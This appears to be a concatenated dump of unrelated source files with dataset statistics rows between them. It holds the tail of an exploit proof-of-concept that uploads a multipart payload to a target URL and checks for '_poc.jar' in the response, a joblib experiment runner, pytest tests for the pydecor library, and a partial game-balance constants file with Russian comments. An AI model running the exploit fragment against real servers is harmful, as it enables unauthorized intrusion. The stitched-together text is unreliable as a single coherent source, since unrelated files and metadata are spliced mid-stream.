--8ce4b16b22b58894aa86c421e8759df3--"""
headers = {'Content-Type': 'multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""application/json""" in str(resp0.headers)) and ("""success""" in resp0.text and """_poc.jar""" in resp0.text) and (resp0.status_code == 200):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url | 27.108108 | 156 | 0.560818 | 210 | 2,006 | 5.333333 | 0.528571 | 0.0375 | 0.024107 | 0.025 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061737 | 0.265204 | 2,006 | 74 | 157 | 27.108108 | 0.6981 | 0.043868 | 0 | 0 | 0 | 0.018868 | 0.363304 | 0.105071 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09434 | false | 0 | 0.018868 | 0.056604 | 0.207547 | 0.018868 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
87680095c411796de2122adf5dd6e5fdfea46b57 | 6,506 | py | Python | runner.py | RokoMijic/ExperimentRunner | db3a7a4d6fb94a5e04d6e036eb3093d0d6585882 | [
"MIT"
] | 1 | 2020-06-05T14:10:35.000Z | 2020-06-05T14:10:35.000Z | runner.py | RokoMijic/ExperimentRunner | db3a7a4d6fb94a5e04d6e036eb3093d0d6585882 | [
"MIT"
] | null | null | null | runner.py | RokoMijic/ExperimentRunner | db3a7a4d6fb94a5e04d6e036eb3093d0d6585882 | [
"MIT"
] | null | null | null | import joblib
from joblib import Parallel, delayed
from joblib import parallel_backend
import contextlib
from tqdm import tqdm
from itertools import product
from functools import cmp_to_key
from more_itertools import unique_everseen
import pandas as pd
import random
import time
@contextlib.contextmanager
def tqdm_joblib(tqdm_object):
"""Context manager to patch joblib to report into tqdm progress bar given as argument"""
class TqdmBatchCompletionCallback:
def __init__(self, time, index, parallel):
self.index = index
self.parallel = parallel
def __call__(self, index):
tqdm_object.update()
if self.parallel._original_iterator is not None:
self.parallel.dispatch_next()
old_batch_callback = joblib.parallel.BatchCompletionCallBack
joblib.parallel.BatchCompletionCallBack = TqdmBatchCompletionCallback
try:
yield tqdm_object
finally:
joblib.parallel.BatchCompletionCallBack = old_batch_callback
tqdm_object.close()
def results_to_df(experirunner_res):
flattened_res_s = [ { **{k:v for (k, v) in res['setting'].items() if k != 'hparams'} , **res['setting']['hparams'], **res['result'] } for res in experirunner_res ]
return pd.DataFrame(flattened_res_s)
def experiment_fn(dataset, algorithm, hparams, metrics_dict):
return algorithm(dataset=dataset, metrics_dict=metrics_dict, **hparams)
def run_experiments(algo_dict, dataset_dict, metrics_dict, hyperp_dict, n_jobs=16, rchoice_hparam = -1, rchoice_tot = -1, verbose=True, is_sorted='asc', backend_name='loky', ret_df=True):
'''
Runs experiments in parallel using joblib
PARAMETERS
algo_dict : Dictionary of algorithms
dataset_dict : Dictionary of datasets
metrics_dict : Dictionary of metrics
hyperp_dict : Dictionary of hyperparams
experiment_fn : Function that runs a single experiment, given a dataset, algorithm and dictionary of hyperparameter values.
The recommended syntax is something like this, though it will vary depending on how the metric is computed.
def experiment_fn(dataset, algorithm, hparams, metrics_dict):
result = algorithm(dataset=dataset, **hparams)
return {n: m( result ) for n, m in metrics_dict.items() }
n_jobs: max number of processes to spawn, default 16
rchoice_hparam: randomly choose up to this many hyperparameter sets.
Default is -1, which indicates using all sets of hyperparameters to make experiments
rchoice_tot: randomly choose up to this many experiments to run.
Default is -1, which indicates running all experiments
verbose: verbosity
is_sorted: sort results by the first metric given, default 'asc' for descending. Possible values: False, 'asc', 'desc'
'''
# Get a list of all possible hyperparameter settings
hyperp_settings_list = [ dict( zip( hyperp_dict.keys() , hparam_tuple ) ) for hparam_tuple in product(*hyperp_dict.values() ) ]
if 0 < rchoice_hparam < len(hyperp_settings_list) : hyperp_settings_list = random.sample(hyperp_settings_list, rchoice_hparam)
# Get a list of all possible experiments
experi_names_list = [ dict( zip( ['dataset', 'algorithm', 'hparams'] , exp_tuple ) )
for exp_tuple in product( dataset_dict.keys(), algo_dict.keys(), hyperp_settings_list ) ]
# Here we remove hyperparameter names/values if the algorithm being used doesn't have them as parameters
for experi_name in experi_names_list:
required_hparams_this_experiment = algo_dict[experi_name['algorithm']].__code__.co_varnames
filtered_hparams_this_experiment = {hpname:hpval for (hpname, hpval) in experi_name['hparams'].items() if hpname in required_hparams_this_experiment }
experi_name['hparams'] = filtered_hparams_this_experiment
# remove dupliicate experiments that have been created by dropping unneeded hyperparameters
experi_names_list = list(unique_everseen(experi_names_list))
if 0 < rchoice_tot < len(experi_names_list) : experi_names_list = random.sample(experi_names_list, rchoice_tot)
# if verbose: print( f"Running {len(experi_names_list)} experiments" )
# convert the names into actual objects for experiments
experi_settings_list = [ { 'dataset' : dataset_dict[setting_n['dataset']] ,
'algorithm' : algo_dict[setting_n['algorithm']] ,
'hparams' : setting_n['hparams'] ,
'metrics_dict' : metrics_dict }
for setting_n in experi_names_list ]
start_t = time.time()
##################################################################################################################
# run all the experiments in parallel with joblib
with parallel_backend(backend_name, n_jobs=n_jobs):
with tqdm_joblib(tqdm(desc=f"Running {len(experi_names_list)} experiments", total=len(experi_settings_list), position=0, leave=True )) as progress_bar:
results = Parallel(n_jobs=n_jobs)(delayed(experiment_fn)(**setting) for setting in experi_settings_list)
##################################################################################################################
end_t = time.time()
if verbose: print("\n%.2f seconds elapsed \n" % (end_t - start_t) )
results_w_settings_list = [ {'setting': s, 'result' : r} for s, r in zip(experi_names_list, results) ]
if is_sorted == 'asc' or is_sorted == 'desc':
first_metric = list(metrics_dict.keys())[0]
def compare_fn(item1, item2):
return (-1 if is_sorted == 'desc' else 1)*(item1['result'][first_metric] - item2['result'][first_metric] )
results_w_settings_list = sorted(results_w_settings_list , key=cmp_to_key(compare_fn))
if ret_df:
return results_to_df(results_w_settings_list)
else:
return results_w_settings_list
| 45.180556 | 187 | 0.626806 | 750 | 6,506 | 5.193333 | 0.274667 | 0.040051 | 0.042362 | 0.025674 | 0.080616 | 0.068293 | 0.044159 | 0.02516 | 0 | 0 | 0 | 0.003968 | 0.264064 | 6,506 | 143 | 188 | 45.496504 | 0.809524 | 0.27467 | 0 | 0 | 0 | 0 | 0.057287 | 0.0055 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107692 | false | 0 | 0.169231 | 0.030769 | 0.369231 | 0.015385 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
876b4a85a4bf452833f0afedb2e9e840f2ad8a96 | 8,054 | py | Python | tests/decorators/test_ready_to_wear.py | Kilerd/pydecor | 2a6169150a0a9b6a41fd88a6cb6885520d71e115 | [
"MIT"
] | 29 | 2017-06-13T13:58:06.000Z | 2022-01-18T05:24:28.000Z | tests/decorators/test_ready_to_wear.py | Kilerd/pydecor | 2a6169150a0a9b6a41fd88a6cb6885520d71e115 | [
"MIT"
] | 18 | 2017-09-04T04:43:12.000Z | 2021-05-17T06:32:07.000Z | tests/decorators/test_ready_to_wear.py | Kilerd/pydecor | 2a6169150a0a9b6a41fd88a6cb6885520d71e115 | [
"MIT"
] | 5 | 2019-12-27T01:17:38.000Z | 2020-11-10T06:30:47.000Z | """Test ready-to-use decorators."""
import typing as t
from logging import getLogger
from time import sleep
from unittest.mock import Mock, call
import pytest
from pydecor.caches import FIFOCache, LRUCache, TimedCache
from pydecor.constants import LOG_CALL_FMT_STR
from pydecor.decorators import (
log_call,
intercept,
memoize,
)
@pytest.mark.parametrize(
"raises, catch, reraise, include_handler",
[
(Exception, Exception, ValueError, False),
(Exception, Exception, ValueError, True),
(Exception, Exception, True, True),
(Exception, Exception, True, False),
(None, Exception, ValueError, False),
(None, Exception, ValueError, True),
(Exception, Exception, None, False),
(Exception, Exception, None, True),
(Exception, RuntimeError, ValueError, False), # won't catch
(Exception, RuntimeError, ValueError, True), # won't catch
],
)
def test_intercept(raises, catch, reraise, include_handler):
"""Test the intercept decorator"""
wrapped = Mock()
wrapped.__name__ = str("wrapped")
if raises is not None:
wrapped.side_effect = raises
handler = Mock(name="handler") if include_handler else None
if handler is not None:
handler.__name__ = str("handler")
fn = intercept(catch=catch, reraise=reraise, handler=handler)(wrapped)
will_catch = raises and issubclass(raises, catch)
if reraise and will_catch:
to_be_raised = raises if reraise is True else reraise
with pytest.raises(to_be_raised):
fn()
elif raises and not will_catch:
with pytest.raises(raises):
fn()
else:
fn()
if handler is not None and will_catch:
# pylint: disable=unsubscriptable-object
called_with = handler.call_args[0][0]
# pylint: enable=unsubscriptable-object
assert isinstance(called_with, raises)
if handler is not None and not will_catch:
handler.assert_not_called()
wrapped.assert_called_once_with(*(), **{}) # type: ignore
def test_intercept_method():
"""Test decorating an instance method with intercept."""
calls = []
def _handler(exc):
calls.append(exc)
class SomeClass:
@intercept(handler=_handler)
def it_raises(self, val):
raise ValueError(val)
SomeClass().it_raises("a")
assert len(calls) == 1
assert isinstance(calls[0], ValueError)
def test_log_call():
"""Test the log_call decorator"""
exp_logger = getLogger(__name__)
exp_logger.debug = Mock() # type: ignore
@log_call(level="debug")
def func(*args, **kwargs):
return "foo"
call_args = ("a",)
call_kwargs = {"b": "c"}
call_res = func(*call_args, **call_kwargs)
exp_msg = LOG_CALL_FMT_STR.format(
name="func", args=call_args, kwargs=call_kwargs, result=call_res
)
exp_logger.debug.assert_called_once_with(exp_msg)
class TestMemoization:
"""Tests for memoization"""
# (args, kwargs)
memoizable_calls: t.Tuple[t.Tuple, ...] = (
(("a", "b"), {"c": "d"}),
((["a", "b", "c"],), {"c": "d"}),
((lambda x: "foo",), {"c": lambda y: "bar"}),
(({"a": "a"},), {"c": "d"}),
((type(str("A"), (object,), {})(),), {}),
((), {}),
((1, 2, 3), {}),
)
@pytest.mark.parametrize("args, kwargs", memoizable_calls)
def test_memoize_basic(self, args, kwargs):
"""Test basic use of the memoize decorator"""
tracker = Mock(return_value="foo")
@memoize()
def func(*args, **kwargs):
return tracker(args, kwargs)
assert func(*args, **kwargs) == "foo"
tracker.assert_called_once_with(args, kwargs)
assert func(*args, **kwargs) == "foo"
assert len(tracker.mock_calls) == 1
def test_memoize_lru(self):
"""Test removal of least-recently-used items"""
call_list = tuple(range(5)) # 0-4
tracker = Mock()
@memoize(keep=5, cache_class=LRUCache)
def func(val):
tracker(val)
return val
for val in call_list:
func(val)
# LRU: 0 1 2 3 4
assert len(tracker.mock_calls) == len(call_list)
for val in call_list:
assert call(val) in tracker.mock_calls
# call with all the same args
for val in call_list:
func(val)
# no new calls, lru order should be same
# LRU: 0 1 2 3 4
assert len(tracker.mock_calls) == len(call_list)
for val in call_list:
assert call(val) in tracker.mock_calls
# add new value, popping least-recently-used (0)
# LRU: 1 2 3 4 5
func(5)
assert len(tracker.mock_calls) == len(call_list) + 1
assert tracker.mock_calls[-1] == call(5) # most recent call
# Re-call with 0, asserting that we call the func again,
# and dropping 1
# LRU: 2 3 4 5 0
func(0)
assert len(tracker.mock_calls) == len(call_list) + 2
assert tracker.mock_calls[-1] == call(0) # most recent call
# Let's ensure that using something rearranges it
func(2)
# LRU: 3 4 5 0 2
# no new calls
assert len(tracker.mock_calls) == len(call_list) + 2
assert tracker.mock_calls[-1] == call(0) # most recent call
# Let's put another new value into the cache
func(6)
# LRU: 4 5 0 2 6
assert len(tracker.mock_calls) == len(call_list) + 3
assert tracker.mock_calls[-1] == call(6)
# Assert that 2 hasn't been dropped from the list, like it
# would have been if we hadn't called it before 6
func(2)
# LRU: 4 5 0 6 2
assert len(tracker.mock_calls) == len(call_list) + 3
assert tracker.mock_calls[-1] == call(6)
def test_memoize_fifo(self):
"""Test using the FIFO cache"""
call_list = tuple(range(5)) # 0-4
tracker = Mock()
@memoize(keep=5, cache_class=FIFOCache)
def func(val):
tracker(val)
return val
for val in call_list:
func(val)
# Cache: 0 1 2 3 4
assert len(tracker.mock_calls) == len(call_list)
for val in call_list:
assert call(val) in tracker.mock_calls
# call with all the same args
for val in call_list:
func(val)
# no new calls, cache still the same
# Cache: 0 1 2 3 4
assert len(tracker.mock_calls) == len(call_list)
for val in call_list:
assert call(val) in tracker.mock_calls
# add new value, popping first in (0)
# Cache: 1 2 3 4 5
func(5)
assert len(tracker.mock_calls) == len(call_list) + 1
assert tracker.mock_calls[-1] == call(5) # most recent call
# Assert 5 doesn't yield a new call
func(5)
assert len(tracker.mock_calls) == len(call_list) + 1
assert tracker.mock_calls[-1] == call(5) # most recent call
# Re-call with 0, asserting that we call the func again,
# and dropping 1
# Cache: 2 3 4 5 0
func(0)
assert len(tracker.mock_calls) == len(call_list) + 2
assert tracker.mock_calls[-1] == call(0) # most recent call
# Assert neither 0 nor 5 yield new calls
func(0)
func(5)
assert len(tracker.mock_calls) == len(call_list) + 2
assert tracker.mock_calls[-1] == call(0) # most recent call
def test_memoization_timed(self):
"""Test timed memoization"""
time = 0.005
tracker = Mock()
@memoize(keep=time, cache_class=TimedCache)
def func(val):
tracker(val)
return val
assert func(1) == 1
assert tracker.mock_calls == [call(1)]
assert func(1) == 1
assert tracker.mock_calls == [call(1)]
sleep(time)
assert func(1) == 1
assert tracker.mock_calls == [call(1), call(1)]
| 29.610294 | 74 | 0.586913 | 1,072 | 8,054 | 4.281716 | 0.166045 | 0.081481 | 0.104575 | 0.061002 | 0.449673 | 0.398475 | 0.389325 | 0.368627 | 0.368627 | 0.368627 | 0 | 0.02344 | 0.295505 | 8,054 | 271 | 75 | 29.719557 | 0.785513 | 0.169853 | 0 | 0.424419 | 0 | 0 | 0.017887 | 0 | 0 | 0 | 0 | 0 | 0.244186 | 1 | 0.081395 | false | 0 | 0.046512 | 0.011628 | 0.174419 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
876bb31792d5bda715bba9f6833569c6590f7aa2 | 33,973 | py | Python | src/the_tale/the_tale/game/balance/constants.py | SilentWrangler/the-tale | a121128edd2a9e36133eb047946ccb9593801ea6 | [
"BSD-3-Clause"
] | null | null | null | src/the_tale/the_tale/game/balance/constants.py | SilentWrangler/the-tale | a121128edd2a9e36133eb047946ccb9593801ea6 | [
"BSD-3-Clause"
] | null | null | null | src/the_tale/the_tale/game/balance/constants.py | SilentWrangler/the-tale | a121128edd2a9e36133eb047946ccb9593801ea6 | [
"BSD-3-Clause"
] | null | null | null |
import smart_imports
smart_imports.all()
TIME_TO_LVL_DELTA: float = 7 # разница во времени получения двух соседних уровней
TIME_TO_LVL_MULTIPLIER: float = 1.02 # множитель опыта, возводится в степень уровня
INITIAL_HP: int = 500 # начальное здоровье героя
HP_PER_LVL: int = 50 # бонус к здоровью на уровень
MOB_HP_MULTIPLIER: float = 0.25 # какой процент здоровье среднего моба составляет от здоровья героя
BOSS_HP_MULTIPLIER: float = 0.5 # какой процент здоровье среднего моба составляет от здоровья героя
TURN_DELTA: int = 10 # в секундах - задержка одного хода
TURNS_IN_HOUR: float = 60.0 * 60 / TURN_DELTA # количество ходов в 1 часе
POWER_PER_LVL: int = 1 # значение "чистой" силы героя (т.е. без артефактов)
EQUIP_SLOTS_NUMBER: int = 11 # количество слотов экипировки
# за скорость получения артефактов принимаем скорость получения их из лута
# остальные способы получения (покупка, квесты) считаем флуктуациями
ARTIFACTS_LOOT_PER_DAY: float = 2.0 # количество новых артефактов, в реальный день
ARTIFACT_FOR_QUEST_PROBABILITY: float = 0.2 # вероятность получить артефакт в награда за квест
# Доли лута и артефактов в доходах героя. В артефакты влючены и награды за задания.
INCOME_LOOT_FRACTION: float = 0.6
INCOME_ARTIFACTS_FRACTION: float = 1.0 - INCOME_LOOT_FRACTION
# магическое число — ожидаемое количество выполненных героем квестов в день
EXPECTED_QUESTS_IN_DAY: float = 2.0
# количество поломок артефактов в день, расчитывается так, чтобы за 3 недели в идеальном случае была обновлена вся экипировка
ARTIFACTS_BREAKING_SPEED: float = EQUIP_SLOTS_NUMBER / (3 * 7.0)
EQUIPMENT_BREAK_FRACTION: float = 0.5 # доля артифактов в экипировке, которые могут сломаться
NORMAL_SLOT_REPAIR_PRIORITY: float = 1.0 # приоритет починки обычного слота
SPECIAL_SLOT_REPAIR_PRIORITY: float = 2.0 # приоритет починки слота из предпочтения
EXP_PER_HOUR: int = 10 # опыт в час
EXP_PER_QUEST_FRACTION: float = 0.33 # разброс опыта за задание
COMPANIONS_BONUS_EXP_FRACTION: float = 0.2 # доля бонусного опыта, которую могут приносить спутники
# с учётом возможных способностей (т.е. считаем, что при нужных абилках у премиума скорость получения опыта будет 1.0)
EXP_FOR_PREMIUM_ACCOUNT: float = 1.0 # модификатор опыта для премиум аккаунтов
EXP_FOR_NORMAL_ACCOUNT: float = 0.66 # модификатор опыта для обычных акканутов
# TODO: привести EXP_FOR_PREMIUM_ACCOUNT к 1.0 (разница с нормальным аккаунтом должна быть 50%)
# сейчас это сделать нельзя т.к. паливо
HERO_MOVE_SPEED: float = 0.1 # базовая скорость героя расстояние в ход
BATTLE_LENGTH: int = 16 # ходов - средняя длительность одного боя (количество действий в бой)
INTERVAL_BETWEEN_BATTLES: int = 3 # ходов - время, между двумя битвами
BATTLES_BEFORE_HEAL: int = 8 # количество боёв в непрерывной цепочке битв
MOVE_TURNS_IN_ACTION_CYCLE: int = INTERVAL_BETWEEN_BATTLES * BATTLES_BEFORE_HEAL
DISTANCE_IN_ACTION_CYCLE: float = HERO_MOVE_SPEED * MOVE_TURNS_IN_ACTION_CYCLE
HEAL_TIME_FRACTION: float = 0.2 # доля времени от цепочки битв, которую занимает полный отхил героя
HEAL_STEP_FRACTION: float = 0.2 # разброс регенерации за один ход
HEALTH_IN_SETTLEMENT_TO_START_HEAL_FRACTION: float = 0.33 # если у героя здоровья меньше, чем указанная доля и он в городе, то он будет лечиться
HEALTH_IN_MOVE_TO_START_HEAL_FRACTION: float = 2 * (1.0 / BATTLES_BEFORE_HEAL) # если у героя здоровья меньше, чем указанная доля и он в походе, то он будет лечиться
TURNS_TO_IDLE: int = 6 # количество ходов на уровень, которое герой бездельничает в соответствующей action
TURNS_TO_RESURRECT: int = TURNS_TO_IDLE * 3 # количество ходов на уровень, необходимое для воскрешения
GET_LOOT_PROBABILITY: float = 0.50 # вероятность получить добычу после боя, если не получен артефакт
# вероятности получить разный тип добычи
EPIC_ARTIFACT_PROBABILITY: float = 0.005
RARE_ARTIFACT_PROBABILITY: float = 0.05
NORMAL_ARTIFACT_PROBABILITY: float = 1 - RARE_ARTIFACT_PROBABILITY - EPIC_ARTIFACT_PROBABILITY
NORMAL_LOOT_COST: float = 1 # стоимость разной добычи на единицу уровня
MAX_BAG_SIZE: int = 12 # максимальный размер рюкзака героя
BAG_SIZE_TO_SELL_LOOT_FRACTION: float = 0.33 # процент заполненности рюкзака, после которого герой начнёт продавать вещи
# относительные размеры различных трат
BASE_EXPERIENCE_FOR_MONEY_SPEND: int = int(24 * EXP_PER_HOUR * 0.4)
EXPERIENCE_DELTA_FOR_MONEY_SPEND: float = 0.5
POWER_TO_LVL: float = EQUIP_SLOTS_NUMBER # бонус к ожидаемой силе на уровнеь героя
# Разброс силы артефактов делаем от -ItemPowerDelta до +ItemPowerDelta.
# за базу берём количество слотов, т.е., теоретически, может не быть предметов с повторяющейся силой
# что бы не вводить дизбаланса, надо на маленьких уровнях уменьшать делту, что бу разница уровня предмета и дельты была неменьше единицы
ARTIFACT_POWER_DELTA: float = 0.2 # дельта, на которую может изменяться сила артифакта
ARTIFACT_BETTER_MIN_POWER_DELTA: int = 5 # минимальная дельта, на которую может изменятся сила лучшего артефакта (для магазина)
# ходов - длинна непрерывной цепочки боёв до остановки на лечение
BATTLES_LINE_LENGTH: int = BATTLES_BEFORE_HEAL * (BATTLE_LENGTH + INTERVAL_BETWEEN_BATTLES) - INTERVAL_BETWEEN_BATTLES
# количество битв в ход в промежутке непрерывных боёв
BATTLES_PER_TURN: float = 1.0 / (INTERVAL_BETWEEN_BATTLES + 1)
WHILD_BATTLES_PER_TURN_BONUS: float = 0.05
# максимально допустимое значение вероятности битв в час
MAX_BATTLES_PER_TURN: float = 0.9
COMPANIONS_DEFENDS_IN_BATTLE: float = 1.5 # среднее количество «защит» героя средним спутником за 1 бой
COMPANIONS_HEAL_FRACTION: float = 0.05 # доля действия уход за спутнкиком со средним количеством здоровья от всех действий героя
HEAL_LENGTH: int = math.floor(BATTLES_LINE_LENGTH * HEAL_TIME_FRACTION) # ходов - длительность лечения героя
ACTIONS_CYCLE_LENGTH: int = math.ceil((BATTLES_LINE_LENGTH + HEAL_LENGTH) / (1 - COMPANIONS_HEAL_FRACTION)) # ходов - длинна одного "игрового цикла" - цепочка боёв + хил
MOVE_TURNS_IN_HOUR: float = MOVE_TURNS_IN_ACTION_CYCLE * (ACTIONS_CYCLE_LENGTH * TURN_DELTA / float(60 * 60))
# примерное количество боёв, которое будет происходить в час игрового времени
BATTLES_PER_HOUR: float = TURNS_IN_HOUR * (float(BATTLES_BEFORE_HEAL) / ACTIONS_CYCLE_LENGTH)
# вероятность выпаденя артефакта из моба (т.е. вероятноть получить артефакт после боя)
ARTIFACTS_PER_BATTLE: float = ARTIFACTS_LOOT_PER_DAY / (BATTLES_PER_HOUR * 24)
# вероятность сломать артефакт после боя
ARTIFACTS_BREAKS_PER_BATTLE: float = ARTIFACTS_BREAKING_SPEED / (BATTLES_PER_HOUR * 24)
ARTIFACT_FROM_PREFERED_SLOT_PROBABILITY: float = 0.25 # вероятность выбрать для покупки/обновления артефакт из предпочитаемого слота
ARTIFACT_INTEGRITY_DAMAGE_PER_BATTLE: int = 1 # уменьшение целостности артефактов за бой
ARTIFACT_INTEGRITY_DAMAGE_FOR_FAVORITE_ITEM: float = 0.5 # модификатор повреждений целостности любимого предмета
_INTEGRITY_LOST_IN_DAY = BATTLES_PER_HOUR * 24 * ARTIFACT_INTEGRITY_DAMAGE_PER_BATTLE
ARTIFACT_RARE_MAX_INTEGRITY_MULTIPLIER: float = 1.5 # коофициент увеличения максимальной целостности для редких артефактов
ARTIFACT_EPIC_MAX_INTEGRITY_MULTIPLIER: float = 2 # коофициент увеличения максимальной целостности для эпических артефактов
ARTIFACT_MAX_INTEGRITY_DELTA: float = 0.25 # разброс допустимой максимальной целостности
ARTIFACT_MAX_INTEGRITY: int = int(round(_INTEGRITY_LOST_IN_DAY * 30, -3)) # максимальная целостность обычного артефакта
ARTIFACT_SHARP_MAX_INTEGRITY_LOST_FRACTION: float = 0.04 # доля максимальной целостности, теряемая при заточке
ARTIFACT_INTEGRITY_SAFE_BARRIER: float = 0.2 # доля от максимальной целостности, артефакт не может сломаться, если его целостность отличается от максимальной меньше чем на эту долю
ARTIFACT_BREAK_POWER_FRACTIONS: Tuple[float, float] = (0.2, 0.3) # на сколько артефакт может сломаться за раз
ARTIFACT_BREAK_INTEGRITY_FRACTIONS: Tuple[float, float] = (0.1, 0.2) # на сколько артефакт может сломаться за раз
PREFERED_MOB_LOOT_PROBABILITY_MULTIPLIER: float = 2.0 # множитель вероятности получения лута из любимой добычи
DAMAGE_TO_HERO_PER_HIT_FRACTION: float = 1.0 / (BATTLES_BEFORE_HEAL * (BATTLE_LENGTH / 2 - COMPANIONS_DEFENDS_IN_BATTLE)) # доля урона, наносимого герою за удар
DAMAGE_TO_MOB_PER_HIT_FRACTION: float = 1.0 / (BATTLE_LENGTH / 2) # доля урона, наносимого мобу за удар
DAMAGE_DELTA: float = 0.2 # разброс в значениях урона [1-DAMAGE_DELTA, 1+DAMAGE_DELTA]
DAMAGE_CRIT_MULTIPLIER: float = 2.0 # во сколько раз увеличивается урон при критическом ударе
# таким образом, напрашиваются следующие параметры мобов:
# - здоровье, в долях от среднемобского - чем больше его, тем дольше моб живёт
# - инициатива, в долях относительно геройской - чем больше, тем чаще моб ходит
# - урон, в долях от среднемобского - чем больше, тем больнее бьёт
# - разброс урона, в долях от среднего - декоративный параметр, т.к. в итоге будет средний урон наноситься
# так как все параметры измеряются в долях, то сложность моба можно высчитать как hp * initiative * damage = 1 для среднего моба
# моб со всеми парамтрами, увеличеными на 10% будет иметь сложность 1.1^3 ~ 1.33
# соответственно, вводня для каждого параметра шаг в 0.1 и скалируя от 0.5 до 1.5, получим 11^3 вариантов параметров (и, соответственно поведения)
# сложность мобов в этом случае будет изменяться от 0.5^3 до 1.5^3 ~ (0.125, 3.375)
#
# возникает проблема обеспечения равномерности прокачки героев на разных территориях - для полностью честных условий необходимо обеспечить одинаковую сложность мобов,
# альтернативный вариант - изменять количесво опыта, даваемого за моба, в зависимости от его сложности, этот вариант кажется как более логичным с точки зрения игрока, так и простым в реализации, на нём и остановимся
#
# расчёт прочей добычи и золота: добыча/трата
# считаем, что если герой не выбил артефакт, то у него есть вероятность выбить добычу
# добычу делим на обычную, редкую и очень редкую
# добыча является основным источником дохода, вырученное за его продажу золото является функцией от уровня и редкости - т.е. есть три фунции от уровня
# добыча, как и мобы, организован в список, отсортированый по уровню, на котором он становится доступным, это позволит открывать игрокам новый контент, а так же сделать разброс цен
##########################
# разные левые "неприкаянные" константы
##########################
DESTINY_POINT_IN_LEVELS: int = 5 # раз в сколько уровней давать очко абилок
SPEND_MONEY_FOR_HEAL_HEALTH_FRACTION: float = 0.75 # герой будет тратить деньги на лечение, когда его здоровье будет меньше этого параметра
##########################
# параметры ангелов
##########################
ANGEL_ENERGY_REGENERATION_TIME: float = 0.5 # раз в сколько часов регенерируем
ANGEL_ENERGY_REGENERATION_AMAUNT: int = 1 # сколько восстанавливаем
ANGEL_ENERGY_REGENERATION_PERIOD: int = int(ANGEL_ENERGY_REGENERATION_TIME * TURNS_IN_HOUR) # раз в сколько ходов
ANGEL_ENERGY_IN_DAY: int = int(24.0 / ANGEL_ENERGY_REGENERATION_TIME * ANGEL_ENERGY_REGENERATION_AMAUNT)
ANGEL_ENERGY_REGENERATION_LENGTH: int = 3 # сколько ходов будет идти ренерация единицы энергии
# энергия должна полностью регенериться за сутки, раз в 2 часа должна появляться новая мажка
##########################
# абилки ангела
##########################
ANGEL_HELP_COST: int = 4
ANGEL_ARENA_COST: int = 1
ANGEL_ARENA_QUIT_COST: int = 0
ANGEL_DROP_ITEM_COST: int = 1
ANGEL_HELP_HEAL_FRACTION: Tuple[float, float] = (0.25, 0.5) # (min, max) процент хелсов, которые будут вылечины
ANGEL_HELP_TELEPORT_DISTANCE: float = 1.0 # расстяние на которое происходит телепорт
ANGEL_HELP_LIGHTING_FRACTION: Tuple[float, float] = (0.25, 0.5) # (min, max) процент урона, который будет нанесён
ANGEL_HELP_CRIT_HEAL_FRACTION: Tuple[float, float] = (0.5, 0.75) # (min, max) процент хелсов, которые будут вылечины
ANGEL_HELP_CRIT_TELEPORT_DISTANCE: float = 3.0 # расстяние на которое происходит телепорт
ANGEL_HELP_CRIT_LIGHTING_FRACTION: Tuple[float, float] = (0.5, 0.75) # (min, max) процент урона, который будет нанесён
ANGEL_HELP_CRIT_MONEY_MULTIPLIER: int = 10
ANGEL_HELP_CRIT_MONEY_FRACTION: Tuple[float, float] = (0.75, 1.25)
ANGEL_ENERGY_INSTANT_REGENERATION_IN_PLACE: int = ANGEL_HELP_COST
INITIAL_ENERGY_AMOUNT: int = 25 * ANGEL_HELP_COST # стартовое количество энергии у игрока (так, чтобы хватило на много помощей, но не чрезмерно)
######################################
# зависимость изменения скорости от изменения безопасности
# при фиксированном количестве боёв за цикл движения, изменение скорости эквивалентное изменению вероятности боя
# можно получить исходя из того, что пройденные пути должны быть равными (т.к. количество ходов движения пренебрежительно мало по сравнению с прочими ходами)
# так же можно пренебречь количеством отдыха
# уравнение:
# y — изменение скорости
# x — изменение вероятности
# 1 / battle_probability - 1 — количество ходов на одну битву
# (1 + y) * speed * (1 / battle_probability - 1) = speed * (1 / (battle_probability - x) - 1)
#
# y = -x / ((battle_probability + x)*(1 - battle_probability))
#
# Так как полученный коофициент зависит от вероятности боя и дельты, а они варьируется, нам необходимо выбрать для «наиболее общего случая»:
# - фиксированную вероятность
# - фиксированную дельту
# которые послужит базой для расчёта коофициента пересчёта безопасности в транспорт
def speed_from_safety(danger: float, battles_per_turn: float) -> float:
return -danger / ((battles_per_turn + danger) * (1 - battles_per_turn))
_SAFETY_TO_TRANSPORT: float = round(-speed_from_safety(0.01, BATTLES_PER_TURN) / 0.01)
##########################
# Карта
##########################
MINIMUM_QUESTS_REGION_SIZE: int = 15
DEFAULT_QUESTS_REGION_SIZE: int = 25
MAP_SYNC_TIME_HOURS: int = 1
MAP_SYNC_TIME: int = int(TURNS_IN_HOUR * MAP_SYNC_TIME_HOURS) # синхронизируем карту раз в N часов
CELL_SAFETY_MIN: float = 0.05
CELL_SAFETY_MAX: float = 0.95
CELL_SAFETY_DELTA: float = 0.01
CELL_SAFETY_NO_PATRULES: float = -0.5
